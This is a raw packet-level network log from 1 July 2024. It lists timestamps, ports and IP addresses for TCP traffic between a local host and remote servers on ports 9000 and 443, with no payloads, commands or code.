Jul 1, 2024 09:16:32.926274061 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.926285982 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.926296949 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.926327944 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.926343918 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.926399946 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.926525116 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.930347919 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.930402994 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.930414915 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.930445910 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.930469990 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.930480957 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.930490971 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.930501938 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.930512905 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.930542946 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.930566072 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.943026066 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.943080902 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.943126917 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.943203926 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.943268061 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.943283081 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.943295002 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.943326950 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.943355083 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.943367958 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.943378925 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.943423033 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.975586891 CEST	443	49791	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:32.975661993 CEST	49791	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:32.976946115 CEST	49791	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:32.976963043 CEST	443	49791	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:32.977224112 CEST	443	49791	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:32.977775097 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.977787971 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.977797985 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.977824926 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.977845907 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.977849960 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.977866888 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.977895021 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.977907896 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.977921009 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.978041887 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.978399992 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.978449106 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.993649006 CEST	49791	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:32.999507904 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.999533892 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.999545097 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.999641895 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.999643087 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.999643087 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.999653101 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.999665976 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.999676943 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.999686956 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:32.999702930 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.999713898 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:32.999749899 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.002388000 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.002399921 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.002413988 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.002427101 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.002450943 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.002485037 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.002505064 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.002515078 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.002526045 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.002536058 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.002563953 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.002579927 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.004899979 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.004911900 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.004925966 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.004937887 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.004960060 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.004991055 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.005003929 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.005016088 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.005027056 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.005065918 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.005804062 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.005834103 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.005845070 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.005852938 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.005878925 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.005908012 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.005919933 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.005968094 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.005979061 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.006009102 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.006023884 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.006097078 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.006108046 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.006119013 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.006146908 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.006162882 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.006217003 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.006228924 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.006239891 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.006251097 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.006256104 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.006280899 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.006303072 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.013175011 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.013187885 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.013199091 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.013252974 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.013262987 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.013273954 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.013281107 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.013286114 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.013298035 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.013298035 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.013309956 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.013319969 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.013353109 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.013803959 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.013818026 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.013834953 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.013845921 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.013851881 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.013856888 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.013874054 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.013904095 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.013933897 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.013946056 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.013957024 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.013967037 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.013972044 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.013981104 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.013998032 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.014024973 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.014120102 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.014130116 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.014151096 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.014168978 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.014185905 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.014200926 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.014269114 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.014280081 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.014292002 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.014308929 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.014318943 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.014333010 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.014359951 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.014424086 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.014436007 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.014446020 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.014457941 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.014468908 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.014478922 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.014494896 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.014514923 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.014632940 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.014645100 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.014657021 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.014698029 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.014720917 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.014731884 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.014744043 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.014754057 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.014765024 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.014780998 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.014794111 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.014935970 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.014946938 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.014959097 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.014977932 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.015002012 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.015012980 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.015024900 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.015036106 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.015048027 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.015050888 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.015078068 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.015100002 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.015279055 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.016329050 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.016338110 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.016349077 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.016398907 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.016407967 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.016418934 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.016427994 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.016431093 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.016448021 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.016448021 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.016465902 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.016505003 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.016557932 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.016658068 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.016949892 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.016963005 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.016973019 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.017011881 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.017021894 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.017033100 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.017044067 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.017050982 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.017071962 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.017091990 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.017488956 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.017529964 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.020818949 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.020833015 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.020844936 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.020895958 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.020906925 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.020908117 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.020926952 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.020937920 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.020950079 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.020961046 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.020977974 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.020991087 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.033885956 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.033900976 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.033915043 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.033940077 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.033976078 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.033982992 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.033994913 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.034001112 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.034007072 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.034080982 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.036505938 CEST	443	49791	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:33.058482885 CEST	443	49792	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:33.058592081 CEST	49792	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:33.059777021 CEST	49792	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:33.059786081 CEST	443	49792	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:33.060023069 CEST	443	49792	34.117.186.192	192.168.2.4
Jul 1, 2024 09:16:33.068824053 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.068837881 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.068850994 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.068895102 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.068907022 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.068917990 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.068929911 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.068928957 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.068974972 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.076637983 CEST	49792	443	192.168.2.4	34.117.186.192
Jul 1, 2024 09:16:33.090398073 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.090456963 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.090491056 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.090523005 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.090555906 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.090588093 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.090605021 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.090620995 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.090620995 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.090629101 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.090653896 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.090667009 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.093808889 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.093818903 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.093831062 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.093878031 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.093889952 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.093889952 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.093903065 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.093914986 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.093920946 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.093950033 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.095715046 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.095726967 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.095737934 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.095778942 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.095803022 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.095804930 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.095813990 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.095825911 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.095844030 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.095844030 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.095854998 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.095866919 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.095896006 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.097069025 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.097086906 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.097099066 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.097110033 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.097121954 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.097130060 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.097137928 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.097150087 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.097151041 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.097172022 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.097184896 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.097240925 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.097251892 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.097263098 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.097274065 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.097276926 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.097285986 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.097296000 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.097296953 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.097316027 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.097326040 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.097341061 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.097367048 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.103868008 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.103878975 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.103897095 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.103949070 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.103949070 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.103949070 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.103961945 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.103988886 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.103991985 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.104006052 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.104012966 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.104037046 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.104059935 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.104257107 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.104269981 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.104295015 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.104319096 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.104335070 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.104347944 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.104358912 CEST	9000	49782	195.201.251.214	192.168.2.4
Jul 1, 2024 09:16:33.104383945 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.104410887 CEST	49782	9000	192.168.2.4	195.201.251.214
Jul 1, 2024 09:16:33.104497910 CEST	9000	49782	195.201.251.214	192.168.2.4
